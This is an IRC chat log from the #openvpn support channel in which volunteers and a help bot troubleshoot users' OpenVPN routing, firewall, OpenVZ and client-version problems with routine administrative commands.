pekster> I assume the tcpdump properly shows the pings that are working? 13:29 < pekster> Yea, you can work backwards to the client, that's a good idea 13:29 < pekster> Make sure the client is actually sending it; the server shouldn't drop traffic on a tunnel that's up that the client sends without a note in the log 13:33 -!- neilhwatson [~neilhwats@cl-274.chi-03.us.sixxs.net] has quit [Ping timeout: 245 seconds] 13:35 -!- neilhwatson [~neilhwats@cl-274.chi-03.us.sixxs.net] has joined #openvpn 13:36 < neilhwatson> that was odd. 
I did not see any traffic on the client's tap0. 13:38 < pekster> Linux on the client? 'ip route get 8.8.8.8' 13:39 < pekster> If it's not the route, it could still be a client-side firewll 13:40 < neilhwatson> 8.8.8.8 via dev tap0 src 13:40 < neilhwatson> Linux client. 13:42 < neilhwatson> iptables clear: https://gist.github.com/neilhwatson/5025038 13:42 <@vpnHelper> Title: openvpn configs (at gist.github.com) 13:44 < neilhwatson> Correct, I do see some traffic, but not the ping. I see the same arp requests and 14:42:52.696532 STP 802.1w, Rapid STP, Flags [Learn, Forward], bridge-id 8000.00:d0:00:71:a9:97.81a4, length 42 13:45 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 13:51 < Devastator> !howto 13:51 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 13:53 < Devastator> this friggin isp, I can't even open howto links 13:53 < pekster> tor, or proxy, or use openvpn to redirect yourself to a host you control 13:54 < pekster> neilhwatson: Even the ping to the server's IP? 13:54 < pekster> Or just not seeing the 8.8.8.8 ping? 13:55 < pekster> If you're connected to the VPN, openvpn will deliver anything sent into tap0 on one side to tap0 on the other, barring a firewall preventing it or network error beweten you dropping the traffic 13:56 < pekster> neilhwatson: If that's the server's netfilter ruleset, it looks fine. net.ipv4.ip_forward =1, so that's good. Have you checked the client firewall? Done the same for client routing table making sure it actually got/applied the two /1 routes for the def1 redirect? Maybe tcpdump the physical interface if you don't see it on tap0 to see if it's routing it wrongly? 13:56 < pekster> Checked client logs for errors applying the routes? 
13:59 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 14:02 -!- meepmeep [meepmeep@212.24.104.229] has quit [Read error: Operation timed out] 14:04 -!- zhvtar [~zhvtar@198.23.139.102] has joined #openvpn 14:04 -!- zhvtar [~zhvtar@198.23.139.102] has quit [Changing host] 14:04 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has joined #openvpn 14:05 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 14:09 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 260 seconds] 14:09 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 14:11 < Devastator> openvpn.net is 67.228.116.150? 14:11 < pekster> Yup, that's the only A record 14:12 < Martin`> there are also 2 mx recors 14:12 < Devastator> time to reconnect again, gotta love my isp and/or level3/gblx 14:12 < Devastator> brb 14:13 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 14:13 < Martin`> good luck 14:15 -!- Devastator- [~devas@186.214.110.44] has joined #openvpn 14:15 -!- Devastator- [~devas@186.214.110.44] has quit [Changing host] 14:15 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 14:16 < Devastator-> yep, now it works.. 14:17 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 255 seconds] 14:18 -!- Devastator- is now known as Devastator 14:18 < Devastator> "local" conf parameter is not what I thought it was.. 14:20 < pekster> Manpage unclear on that point? "Local host name or IP address for bind. If specified, OpenVPN will bind to this address only. If unspecified, OpenVPN will bind to all interfaces." 14:20 < Devastator> no, not at all 14:21 < Devastator> I'm thinking my approach 14:23 < Devastator> maybe if I create a bridge and put both wan interfaces there... hum, does local accepts interfaces instead of address? 
14:24 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 14:25 < Devastator> nevermind, I guess it's not good to bind openvpn to public addresses directly 14:25 < pekster> No. It makes a call to the system bind() function which binds to address, never to interfaces 14:26 < Devastator> got it 14:32 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 14:34 < DougEFresh> wat 14:44 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 14:47 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has quit [Ping timeout: 252 seconds] 14:53 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 14:54 -!- max_ [~max@98.225.19.83] has joined #openvpn 15:00 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 252 seconds] 15:00 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 252 seconds] 15:01 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn 15:02 < DougEFresh> what up dogs 15:03 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 245 seconds] 15:06 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 15:14 -!- combat7331 [~Mamba@d54C65431.access.telenet.be] has joined #openvpn 15:14 < combat7331> Hello 15:14 < combat7331> I'm trying to connect to a VPN server on my linux box 15:14 < combat7331> It's running on OpenCZ 15:14 < combat7331> VZ* 15:15 < combat7331> but it seems that no traffic is passed through the tun interface 15:16 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 15:16 < pekster> !openvz 15:16 <@vpnHelper> "openvz" is (#1) http://wiki.openvz.org/VPN_via_the_TUN/TAP_device to learn bout openvz specific stuff with regards to openvpn or (#2) It is usually less painful to switch to a host with better virtualization technology, eg Xen. 
15:16 < combat7331> TUN works on my OpenVZ 15:16 < combat7331> I just can't connect to an OpenVPN server 15:17 < combat7331> http://pastebin.com/VFm5UFYs 15:17 < combat7331> is the log of the client 15:18 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 15:18 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 15:18 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 15:18 -!- mode/#openvpn [+o krzee] by ChanServ 15:20 < pekster> Update your client 15:20 < pekster> 2.0.9 can't handle the topology push 15:20 < pekster> !download 15:20 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only 15:20 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs 15:20 < pekster> Your client version is over 7 years old 15:20 < combat7331> yum ... 15:20 <@krzee> !repo 15:20 <@vpnHelper> "repo" is openvpn runs some software repositories for your installing pleasure, http://community.openvpn.net/openvpn/wiki/OpenvpnSoftwareRepos 15:21 < combat7331> 2.2.2 would do? 15:21 <@krzee> yep 15:21 < combat7331> ok, will get it from epel 15:22 -!- corretico [~luis@190.211.93.38] has joined #openvpn 15:22 -!- corretico_ [~luis@190.211.93.38] has joined #openvpn 15:22 -!- corretico [~luis@190.211.93.38] has quit [Client Quit] 15:22 -!- corretico_ [~luis@190.211.93.38] has quit [Client Quit] 15:22 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn 15:22 -!- corretico [~luis@190.211.93.38] has joined #openvpn 15:22 < EugeneKay> What still has 2.0.9? CentOS 5?
15:22 < combat7331> yes 15:23 < combat7331> i think i got it from the atomic repo 15:23 < EugeneKay> Yeah, time to upgrade to 6 :-p 15:23 < combat7331> too much ram >.< 15:23 < combat7331> i like saving the 10MB ;p 15:24 < EugeneKay> .....perhaps Gentoo is a better fit for you? http://funroll-loops.info/ 15:24 <@vpnHelper> Title: Welcome to Gentoo is Rice, the Volume goes to 11 here. (at funroll-loops.info) 15:24 < combat7331> used to centos :) 15:25 < combat7331> i just got so many files on this box 15:25 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 15:25 < combat7331> and its running on 16gb ram anyways 15:25 < EugeneKay> If you're squabbling about 10MB of RAM in an era where phones have 2GB.... yeah. 15:26 < combat7331> low end boxes for the win 15:26 < EugeneKay> My smallest VM has 512MB, and it runs MySQL, Apache, PHP-FPM, Postfix, and ZNC just fine 15:26 < combat7331> OS? 15:26 < EugeneKay> Scientific Linux 6 15:27 < combat7331> mine is 128MB 15:27 < combat7331> and runs CentOS 5 x86 15:27 < EugeneKay> You poor git 15:27 < combat7331> my biggest one has 32GB RAM and I used to run OpenVZ VPS's on it 15:28 < combat7331> But yea CentOS 6 would do good 15:31 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 15:34 < combat7331> hello pekster? it doesn't seem to be connected 15:35 < combat7331> http://pastebin.com/KYV0Vzg9 15:43 < combat7331> Does anyone have an idea? 15:46 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 15:47 <@krzee> you seriously using 1.2.3.0/24? 15:47 < combat7331> why not 15:47 <@krzee> !1918 15:47 <@vpnHelper> "1918" is (#1) RFC1918 makes three unique netblocks available for private use: 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 or (#2) see also: http://en.wikipedia.org/wiki/Private_network or http://www.faqs.org/rfcs/rfc1918.html or (#3) Too lazy to find your own subnet?
Try this one: http://scarydevilmonastery.net/subnet.cgi 15:47 < combat7331> easy to remember :p 15:47 < EugeneKay> ....you run OpenVZ VPSes, and are wanting to know why 1.2.3.0/24 is a bad idea 15:47 < combat7331> oh <.< 15:48 < EugeneKay> I think this is the part where I stop paying attention 15:48 < combat7331> used it for ages and always worked perfectly 15:50 <@plaisthos> that it works does not mean there are no problems :) 15:50 < combat7331> true 15:51 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 15:52 < combat7331> doesn't work either with a different subnet 15:57 -!- neilhwatson [~neilhwats@cl-274.chi-03.us.sixxs.net] has quit [Quit: Leaving.] 16:01 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 16:03 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 16:03 < combat7331> does anyone have a clue, i honestly don't :(. 16:06 <@krzee> what sort of connection does your client have to its default gateway? 16:06 < combat7331> ethernet 16:06 <@krzee> is it a laptop or a desktop? (will it be changing networks?) 16:07 < combat7331> its a VPS server running OpenVZ on a VPS node connected to a datacenter network. 16:07 <@krzee> netstat -rn 16:07 <@krzee> (pastebin) 16:08 < combat7331> http://pastebin.com/UrnXNWKF 16:09 -!- db48x2 [~db48x@50-0-51-244.dsl.static.sonic.net] has joined #openvpn 16:09 <@krzee> it default routes to a vm? 16:09 < combat7331> to eth0 interface on the node yes 16:09 < db48x2> !welcome 16:09 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. 
|| Also interesting: !man !/30 !topology !iporder !sample !forum 16:09 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 16:09 < combat7331> thats how the network works 16:09 < combat7331> on openvz 16:10 < combat7331> I'm not sure but i think it's bridged 16:10 <@krzee> maybe route-gateway will work but i dunno 16:10 < db48x2> I guess you guys get the same questions over and over :) 16:10 <@krzee> but ya, openvpn cant figure out whats up with your default route 16:10 <@krzee> db48x2, yep ;] 16:10 < db48x2> !goal 16:10 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 16:11 < combat7331> route-gateway just provides my gateway? 16:11 < combat7331> that my ISP gave me? 16:11 <@krzee> oh actually no nevermind route-gateway will not help 16:11 < db48x2> !/30 16:11 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf 16:11 < combat7331> what would then :( 16:11 < db48x2> heh 16:12 <@krzee> combat7331, 16:12 <@krzee> !configs 16:12 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn.
or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 16:13 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 16:13 <@krzee> combat7331, also show me this: /sbin/ip route list exact 0.0.0.0/0 16:13 < combat7331> on client or server? 16:14 <@krzee> which machine had "Sun Feb 24 23:30:31 2013 NOTE: unable to redirect default gateway -- Cannot read current default gateway from system" 16:14 < combat7331> client 16:14 <@krzee> …then the client 16:14 < combat7331> http://pastebin.com/7ftZk1iz 16:14 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 16:15 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 16:16 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 16:18 < db48x2> so, my goal is to be able to access the internet over my vpn, but although my client's udp traffic reaches the server, it doesn't show up on the server's tun device. here's my configuration: http://pastebin.com/8jhUYazt 16:18 < db48x2> there's nothing in the log except startup messages, although I'd be happy to paste them momentarily 16:18 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn 16:19 < db48x2> oh, and this is openvpn 2.2.2 on Fedora 16:19 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:19 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 252 seconds] 16:20 < combat7331> I'll have to go, I guess it's not possible with OpenVZ. 
16:20 -!- combat7331 [~Mamba@d54C65431.access.telenet.be] has quit [] 16:21 <@krzee> lol 16:21 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [] 16:21 <@krzee> db 16:21 <@krzee> err 16:21 <@krzee> db48x2, 16:21 <@krzee> !redirect 16:21 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 16:21 <@vpnHelper> http://ircpimps.org/redirect.png 16:22 <@krzee> once we get you connected, you'll be able to use that 16:22 <@krzee> but it sounds like you're stuck at the very top for now, cant connect to the vpn 16:22 <@krzee> !logs 16:22 <@vpnHelper> "logs" is (#1) please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it and select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 16:22 <@krzee> (verb 5) 16:22 < db48x2> yes, I don't have the default route set in the client config, because that makes it hard to look things up :) 16:22 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Client Quit] 16:23 <@krzee> thats cool for now 16:23 < db48x2> good flowchart, yes, I'm at the very top 16:23 < db48x2> lemme show you the logs 16:23 <@krzee> lets get your vpn connected first, then we'll worry about changing the gateway 16:23 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 16:24 < db48x2> that should just be a matter of uncommenting it from the config :) 16:24 <@krzee> right 16:24 <@krzee> assuming ip forwarding is enabled and nat is configured right ;] 16:24 < db48x2> http://pastebin.com/0wUMy5sN 16:24 < 
db48x2> yea, it _should_ be right, but with no way to test it... :) 16:24 <@krzee> thats not verb 5 16:24 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 16:26 < db48x2> you're right, the server is at verb 4 right now; I was trying different verbosity levels 16:26 <@krzee> the config you posted had verb 3, you didnt change anything else right? 16:26 < db48x2> nothing else 16:27 <@krzee> k so make it verb 5 and post both sides 16:27 < db48x2> sure, one moment 16:32 < db48x2> hmm, interesting 16:33 < db48x2> db48x.net/temp/{server,client}.log 16:33 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 252 seconds] 16:35 <@krzee> no W and R after that? 16:35 <@krzee> i was expecting a bunch of WWW RRRR WRWRWR stuff 16:35 < db48x2> nope 16:36 <@krzee> Feb 24 14:29:18 celebdil kernel: [1073042.168148] type=1400 audit(1361744958.996:54): avc: denied { read } for pid=9242 comm="openvpn" name="openvpn-key.txt" dev="sdg5" ino=4656 scontext=system_u:system_r:openvpn_t:s0 tcontext=system_u:object_r:file_t:s0 tclass=file 16:36 <@krzee> Feb 24 14:29:18 celebdil kernel: [1073042.168157] type=1400 audit(1361744958.996:55): avc: denied { open } for pid=9242 comm="openvpn" path="/etc/openvpn/openvpn-key.txt" dev="sdg5" ino=4656 scontext=system_u:system_r:openvpn_t:s0 tcontext=system_u:object_r:file_t:s0 tclass=file 16:36 <@krzee> Feb 24 14:29:18 celebdil kernel: [1073042.168210] type=1400 audit(1361744958.996:56): avc: denied { getattr } for pid=9242 comm="openvpn" path="/etc/openvpn/openvpn-key.txt" dev="sdg5" ino=4656 scontext=system_u:system_r:openvpn_t:s0 tcontext=system_u:object_r:file_t:s0 tclass=file 16:36 <@krzee> your kernel is stopping openvpn, selinux or something 16:36 < db48x2> selinux is in permissive mode, so that's just a warning 16:36 <@krzee> ahh 16:36 < db48x2> I do get openvpn[9246]: read UDPv4 [EHOSTUNREACH]: No route to host (code=113) every time ping tries to ping the server 16:36 
<@krzee> show me iptables -L from both sides 16:38 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 16:39 < db48x2> oh dear, the client computer's firewall is complicated 16:39 <@krzee> !ipforward 16:39 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 16:39 <@krzee> err no 16:39 <@krzee> hrm 16:39 <@krzee> !linipforward 16:39 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 16:39 <@krzee> iptables -I FORWARD -i tun+ -j ACCEPT 16:39 <@krzee> try that 16:39 <@krzee> then reconnect 16:40 < db48x2> the udp packets are making it to the server though 16:40 <@krzee> do you understand the command i just pasted? 16:40 < db48x2> yes 16:40 -!- Suterusu1 [~EyeR@host81-152-141-152.range81-152.btcentralplus.com] has joined #openvpn 16:40 <@krzee> you sure? 16:41 < db48x2> it also doesn't fix it 16:41 <@krzee> which machine did you try it on? 16:41 <@krzee> also, no guarantee it will work, since you didnt paste the firewalls 16:43 <@krzee> and is your client being started as root? 16:43 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 16:43 < db48x2> http://pastebin.com/JH6NYBdC 16:44 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 16:44 <@krzee> and the other?
16:45 < db48x2> db48x.net/temp/client.iptables 16:45 < db48x2> but irrelevant, since udp packets from the client are arriving at the server 16:46 < rob0> fine, unless you blocked the tun interface 16:46 <@krzee> right 16:47 -!- Suterusu1 [~EyeR@host81-152-141-152.range81-152.btcentralplus.com] has quit [Ping timeout: 260 seconds] 16:47 <@krzee> i figured you caught that when you said you understood the command i said to enter 16:48 < db48x2> what do you mean by blocked? I'm pinging the server's vpn address from the client, and openvpn is wrapping them up and sending them to the server 16:48 < db48x2> so it can't be blocked 16:48 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 16:48 < db48x2> the command you gave me enables forwarding from any tun device, which is what I want to happen on the server, eventually 16:48 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 16:49 <@krzee> packets must forward to the tun device, or theres no vpn 16:49 <@krzee> ever. 16:49 < EugeneKay> openvpn is not a magical network device. The tun driver is the one built into the linux kernel. 16:49 < db48x2> I'm not going to bother having the client forward packets from my local net to the vpn 16:50 <@krzee> you're not understanding 16:50 < db48x2> only my client machine will access the vpn 16:50 < db48x2> quite possible! 16:50 < rob0> !iptables 16:50 <@vpnHelper> "iptables" is (#1) to test if iptables is your problem, disable all rules or put the defaults to accept: iptables -P INPUT ACCEPT; iptables -P OUTPUT ACCEPT; iptables -P FORWARD ACCEPT; iptables -F; iptables -Z or (#2) please see http://openvpn.net/man#lbBD for more info or (#3) you can see http://www.secure-computing.net/wiki/index.php/OpenVPN/Firewall for pf or iptables or (#4) These are just the 16:50 <@vpnHelper> basics to get OpenVPN working. Proper firewall design is beyond the scope of this channel.
You can try #iptables 16:50 < EugeneKay> Packets from the tun device have to be allowed to get forwarded to eth#, and then back the other direction for responses 16:51 <@krzee> trying to follow those rules hurts my eyes 16:51 <@krzee> im guessing they are so abstracted because of some sort of web gui compatibility or something 16:52 < db48x2> my point is merely that when I ping my server's vpn address, a udp packet arrives at the server on port 1194 16:53 < db48x2> so packets are being forwarded from the client's tun device out to the network 16:53 <@krzee> oh ya? and is that ping making it all the way? 16:53 < db48x2> the server doesn't generate a reply 16:54 < db48x2> the packet counts on the server's tun device don't increase 16:54 <@krzee> does the server receive the ping? 16:54 < EugeneKay> Are you firewalling ICMP 16:54 < db48x2> no, only the udp packets 16:54 < db48x2> all ICMP packets are accepted 16:55 <@krzee> i notice that your posted server iptables rules dont have the rule i told you to add 16:56 < db48x2> ACCEPT all -- anywhere anywhere on chain FORWARD 16:56 <@krzee> thats the command i said to enter? 16:56 < db48x2> that's what it results in 16:57 <@krzee> nuh uhhh 16:57 < db48x2> I can run it again and add another such rule to the list :) 16:57 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
16:57 < db48x2> ACCEPT all -- anywhere anywhere 16:57 < db48x2> ACCEPT all -- anywhere anywhere 16:57 < db48x2> ACCEPT all -- anywhere anywhere 16:57 < db48x2> :) 16:58 <@krzee> i guess theres some other way of seeing it where interface is in there 16:58 <@krzee> i dont reallyuse linux 16:58 <@krzee> dont really use* 16:58 < db48x2> yea, -v 16:59 < db48x2> pkts bytes target prot opt in out source destination 16:59 < db48x2> 0 0 ACCEPT all -- tun0 any anywhere anywhere 16:59 < db48x2> 0 0 ACCEPT all -- tun+ any anywhere anywhere 16:59 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 16:59 <@krzee> there we go 17:01 < db48x2> hahaha, I figured it out 17:01 <@krzee> what was it? 17:01 < db48x2> I never accepted udp packets on port 1194 on the INPUT chain, because I never restarted the service 17:01 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 17:02 <@krzee> the topic wins again! 17:02 <@krzee> "Your problem is probably firewall, Really" 17:02 < Suterusu> MYne isn't 17:02 < Suterusu> lol 17:03 <@krzee> we'll see bout that! 17:03 < Suterusu> lol 17:03 < db48x2> yea, firewalls are tricky, no doubt 17:03 <@krzee> heh 17:03 < rob0> and iptables is not actually a service, that's just how your distro presents it to you. 
17:04 < db48x2> yes, yes 17:04 < Suterusu> If t'was me firewall it'd be total, and not intermittent - also, i'd be featuring 'random' d/c's from my VPN before the last few days (its been up ~70 days) 17:04 < db48x2> I forgot to thwack it upside the head and reinitialize its tables 17:04 <@krzee> Suterusu, 17:04 <@krzee> !goal 17:04 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 17:05 <@krzee> Suterusu, no mind-readers here ;] 17:05 < Suterusu> 'tis for tunneling me internot thru - I gets err msg in openvpn.log: Mon Feb 25 01:59:06 2013 us=362376 CBD-Orthus/81.152.141.152:37229 MULTI: bad source address from client [192.168.1.113], packet dropped -=- Pekster suggested running tcpdump on client - which I has done, muchly - Can't correlate event, tho 17:06 < rob0> hehe, internot 17:09 <@krzee> Suterusu, something running on your client is sending traffic with src ip of eth interface 17:09 <@krzee> in windows smb file sharing sometimes does that 17:10 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 17:11 < db48x2> thanks krzee, and everyone else, for your help 17:11 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 17:11 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 17:12 <@krzee> yw 17:16 < Suterusu> Did me last msg make it - or you still trying to read minds?
17:16 <@krzee> [19:09] Suterusu, something running on your client is sending traffic with src ip of eth interface 17:16 <@krzee> [19:09] in windows smb file sharing sometimes does that 17:16 -!- db48x2 [~db48x@50-0-51-244.dsl.static.sonic.net] has quit [Ping timeout: 257 seconds] 17:16 < Suterusu> Ahh, missed that, taa 17:16 <@krzee> np 17:17 < Suterusu> Can't spot nothing using me internal IP via tcpdump - in openvpn.log on server, however, I can see many instances of this - but they is accepted and don't result in d/c 17:17 < Suterusu> Usually towards beginnin o connection 17:17 -!- ihptru [~ihptru@2a02:2770::21a:4aff:fef3:cdbb] has quit [Ping timeout: 245 seconds] 17:18 -!- folivora [~out@46.19.34.64] has quit [Ping timeout: 260 seconds] 17:19 < Suterusu> How could one set it so w/o VPN, Things can't get to the 'net? As in, when I'm d/c'd from VPN? Or, preferably, has it reconnect to the VPN automatically? 'tis set 'connect automatically' in network manager, doesn't appear to have done much 17:24 < pekster> Suterusu: the server is printing the IP it's rejecting the access from 17:24 -!- folivora [~out@46.19.34.64] has joined #openvpn 17:24 -!- ihptru [~ihptru@164.138.25.4] has joined #openvpn 17:24 < pekster> So, if you run a VPN on 10.8.0.0/24 and your eth0 IP of client is 192.168.0.7, you might get a message something like "dropping bad src from client [client1]: 192.168.0.7" 17:25 < pekster> I forget exactly how the message is formatted, but it's telling you in my example that client1 had a bad (ie: invalid, not allowed) packet source from a "bogus" address of 192.168.0.7 17:25 < pekster> Windows likes to do that a lot as a client (at my last $job we had a big issue with windows NTP, of all things, doing that) 17:25 < pekster> It doesn't "break" anything besides the stupid client-side program that gets it's traffic dropped for doing dumb things like that 17:26 < pekster> its* 17:29 < Suterusu> Does appear t'be my IP - but tcp dump only shows the VPN IP - the 
disconnection appears to happen before the string of 'bad source'. by a few mins. I've accounted for time differences on the machines 17:29 -!- nsgn2 [~nsgn@cpe-24-28-31-68.austin.res.rr.com] has joined #openvpn 17:30 < nsgn2> howdy. this openvpn connect app on iphone is sick. only question i have about it is this: can i force all traffic over it? i can't seem to find a way to do this but i'd like to be able to 17:30 -!- db48x2 [~db48x@ec2-50-17-137-230.compute-1.amazonaws.com] has joined #openvpn 17:30 < db48x2> success! 17:30 < db48x2> thanks again 17:31 < pekster> nsgn2, you probably want to redirect traffic using the default gateway: 17:31 -!- db48x2 [~db48x@ec2-50-17-137-230.compute-1.amazonaws.com] has left #openvpn [] 17:31 < pekster> !redirect 17:31 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 17:31 <@vpnHelper> http://ircpimps.org/redirect.png 17:32 < nsgn2> !def1 17:32 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 17:32 < nsgn2> ah. 
seems fairly straightforward 17:33 < nsgn2> thanks 17:33 <@krzee> Suterusu, right its not a fatal error, only those packets going over the vpn with src ip of eth interface are being dropped, everything else has src address of vpn ip and it works fine 17:33 -!- matsh_ [divine@nanogene.org] has joined #openvpn 17:33 <@krzee> Suterusu, odds are that error has nothing to do with your disconnects 17:33 -!- oc80z [oc80z@blea.ch] has quit [Excess Flood] 17:34 <@krzee> and those errors are from some app on your system using the wrong src ip 17:34 -!- oc80z [oc80z@blea.ch] has joined #openvpn 17:34 -!- matsh [divine@nanogene.org] has quit [Ping timeout: 240 seconds] 17:34 -!- matsh_ is now known as matsh 17:37 < Suterusu> Its not 'some app' as I get disconnected 17:37 < Suterusu> This wasn't happening, say a week ago 17:37 < Suterusu> or even four days 17:38 < Suterusu> If it was something local, then tcpdump should has it? somewhere near the d/c ? 17:41 < pekster> You do not get that message on the server unless it *received* a packet with a bad source. You can't receive a packet unless it was sent 17:41 < Suterusu> netstat picks that port no as being used by openvpn, But other than that, I can't place that connection 17:41 < pekster> huh? 17:41 < pekster> No, on the tap0 adapter 17:41 < pekster> the VPN peer has no clue what you're doing on the ethernet interface of the client. Only the tun/tap device 17:41 < Suterusu> Thats what I'm running tcpdump on, 